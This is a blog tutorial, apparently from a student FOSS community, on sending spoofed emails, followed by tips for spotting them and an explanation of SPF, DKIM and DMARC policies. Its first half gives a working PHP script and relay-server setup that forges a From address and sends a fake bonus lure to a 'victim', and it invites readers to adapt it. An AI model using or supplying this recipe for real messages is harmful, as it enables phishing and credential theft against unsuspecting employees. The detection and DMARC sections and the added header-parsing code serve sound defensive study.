A basic way to send ‘Spoofed Emails’

Ravindu Thomas
SLIIT FOSS Community
Jan 20, 2023

When it comes to phishing emails, everyone knows to check the “From” address header to see whether the email came from the original domain. But what if the “From” header can be forged to look like it came from a legitimate server? That poses a significant threat to an organization.

Spoofed email can be used to:

1. Send emails to employees asking them to reset their password

2. Send emails to employees with malicious attachments

3. Route users to malicious websites to steal credentials

Users may fall victim to these kinds of attacks, since most users do not know how to inspect email headers, for example to see whether the email has passed the SPF, DKIM and DMARC checks.

How to send a spoofed email;

There are several methods to send spoofed emails; here I will guide you through one of them.

First of all, you have to create an SMTP server for yourself.

You can create a free SMTP server from this link;

https://www.sendinblue.com/

After creating the account, go to SMTP & API and copy the credentials to a notepad.

Run the following PHP script to send the spoofed mail.

<?php
$email = 'victim@example.com';
$subject = 'Congratulations!!';
$body = 'Dear Employee, Congratulations!! You have recieved a bonus of $10000 for this month. click the link below to claim the bonus';
$headers = array(
'From: Info <info@example.com>',
'X-Mailer: PHP/' . phpversion()
);
mail($email, $subject, $body, implode("\n", $headers));
print('mail sent')
?>

Configure $email, $subject, $body and $headers according to your needs.

You can run this script in a code editor; I used ‘vscode’.

Note: To run this you will need the PHP interpreter package.

Obtain the thread safe package from here;

https://windows.php.net/download/

Install and add PHP to PATH.

After installation, go to the PHP installation path and look for the file php.ini-development.

Rename it to php.ini and edit the php.ini file as follows;

Note: You will need to remove the ‘;’ to uncomment the values.

extension=curl
extension=gd
extension=imap
extension=mbstring
extension=openssl
extension=pdo_mysql

Then scroll down until you find the ‘[mail function]’ section.

Set the following path for sendmail, which comes with the installation of XAMPP.

sendmail_path = C:\xampp\sendmail\sendmail.exe

Then go to the sendmail path and edit the sendmail.ini file as follows;

smtp_server= add the smtp server that you have created previously
smtp_port= 587
auth_username= give the username from the smtp server
auth_password= give the password from the smtp server

After successful execution of the script, I receive a mail from an email address that looks like a legitimate one.

How to Identify Spoofed Email;

  • Sometimes the attacker modifies a legitimate address, such as support@fb.com into supportteam@facebook.com, which can be easily identified.
  • If any links are present, hover the mouse over them to see whether the destination is legitimate.
  • Check whether any attachments are present that look malicious.

How to Prevent Spoofed emails;

  1. Configure SPF authentication protocol.
  2. Configure DKIM verification
  3. Configure DMARC checks

We can configure DMARC to handle the mail in three different ways when the DMARC check fails.

  1. Report-only mode (p=none): This mode is called the monitoring policy, since it only gives insight into who is sending email on behalf of a domain and does not affect deliverability.
  2. Quarantine mode (p=quarantine): If the DMARC check fails, the spoofed email is quarantined and delivered to the Spam or Junk folder of the user’s mailbox.
  3. Reject mode (p=reject): The destination server rejects the email and it is not delivered to the user. This mode will completely mitigate the impact of spoofing.
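
The receiving server records the SPF, DKIM and DMARC results in the Authentication-Results header, which is what a header inspection looks at. The Python below is an added example, not part of the original article: it reads those verdicts from a constructed message and maps a DMARC failure to the three policy modes above. The host names mx.receiver.test and bounce.mailer.test and the function names are assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message (host names are made up): the From header claims
# example.com, but the receiving server recorded SPF, DKIM and DMARC failures.
SAMPLE = """\
Authentication-Results: mx.receiver.test;
 spf=fail smtp.mailfrom=bounce.mailer.test;
 dkim=none;
 dmarc=fail header.from=example.com
From: Info <info@example.com>
Subject: Congratulations!!

Dear Employee, ...
"""

# Outcome of a DMARC failure under each policy mode listed above.
ON_DMARC_FAIL = {
    "none": "delivered normally, reported only",
    "quarantine": "delivered to spam/junk folder",
    "reject": "rejected, not delivered",
}

def auth_verdicts(raw, trusted_authserv="mx.receiver.test"):
    """Return (From domain, spf/dkim/dmarc results) for a raw message."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    verdicts = dict.fromkeys(("spf", "dkim", "dmarc"), "missing")
    for header in msg.get_all("Authentication-Results", []):
        authserv, _, results = header.partition(";")
        if authserv.strip().lower() != trusted_authserv:
            continue  # not stamped by our own server; a sender can add such headers
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", results, re.I):
            verdicts[method.lower()] = result.lower()
    return from_domain, verdicts

def disposition(verdicts, policy):
    """Map the DMARC verdict to what happens under p=none/quarantine/reject."""
    if verdicts["dmarc"] == "pass":
        return "delivered normally"
    if verdicts["dmarc"] == "missing":
        return "no trusted DMARC verdict, treat as unauthenticated"
    return ON_DMARC_FAIL[policy]

if __name__ == "__main__":
    domain, verdicts = auth_verdicts(SAMPLE)
    for policy in ON_DMARC_FAIL:
        print(domain, verdicts, f"p={policy}:", disposition(verdicts, policy))
```

Set trusted_authserv to the identifier your own mail server writes at the start of its Authentication-Results header; headers carrying any other identifier are ignored.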

Some emails are sent directly from the source after the SMTP server has been compromised; in that case email header analysis alone cannot identify whether the email is legitimate, since the SPF, DKIM and DMARC checks pass.

If you know more methods to send spoofed emails, don’t hesitate to comment.
